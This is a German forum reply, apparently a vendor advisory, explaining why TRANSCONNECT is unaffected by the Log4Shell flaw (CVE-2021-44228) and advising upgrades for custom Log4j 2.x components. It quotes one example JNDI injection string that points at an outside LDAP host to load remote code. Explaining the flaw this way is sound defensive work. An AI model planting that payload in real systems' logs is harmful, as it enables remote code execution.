Antwort auf: Log4j Sicherheitslücken (CVE-2021-44228,CVE-2021-4104,CVE-2021-44832,CVE-2019-17571)

    Holger Rehn
    Betrachter
    TRANSCONNECT ist nicht von dieser Lücke betroffen.

    Die Sicherheitslücke CVE-2021-44228 in Log4j betrifft die Lookup-Funktion der Versionen 2.0 bis 2.14.1. Damit kann ein Angreifer serialisierte Daten von einer externen Quelle laden und somit potenziell beliebigen Programmcode mit den Rechten des betroffenen Systems ausführen. Konkret erfolgt das über ein Textfragment „${“ (z.B. ${jndi:ldap://1.2.3.4:1234/malicousCode}) an beliebiger Stelle einer Log-Ausschrift. TRANSCONNECT nutzt allerdings Log4j Version 1.2 ohne eine derartige Funktion und ist somit nicht davon betroffen.

    Falls Sie aber eigene Komponenten (Adapter, Plugins o.ä.) benutzen, die auf Log4j 2.x basieren, sollten Sie schnellstmöglich ein Update auf Log4j Version 2.15 vornehmen! Mit dieser Version wurde die Lookup-Funktion als Default-Einstellung deaktiviert. (Update: Inzwischen ist ein weiter gegen dieses Problem gehärtetes Log4j 2.17 verfügbar.)

    Zur Abschätzung des Risikos einer möglicherweise bereits erfolgten Infiltration, falls Sie selbst Log4j 2.x für eigene Komponenten nutzen: Zur Ausnutzung der Lücke muss ein Angreifer lediglich in der Lage sein, ein Textfragment in einer Log-Ausschrift unterzubringen, um die besagte Lookup-Funktion zu triggern. Sobald irgendeine Art externer Zugriff auf ein von der Schwachstelle betroffenes System (z.B. über eine Webschnittstelle) möglich ist, sollte man davon ausgehen, dass ein Angriff bereits erfolgt sein könnte. Entweder könnte die Schwachstelle direkt über eine entsprechende Nutzdaten-Protokollierung ausgenutzt worden sein, oder aber über eine extra dafür provozierte Fehlermeldung (diese werden ja wahrscheinlich immer geloggt). Nur solange das Logging eigener Komponenten keinerlei von außen gelieferte Daten/Texte – auch nicht als Teil einer Fehlermeldung – beinhalten kann, ist ein Angriff auszuschließen.

    3
    0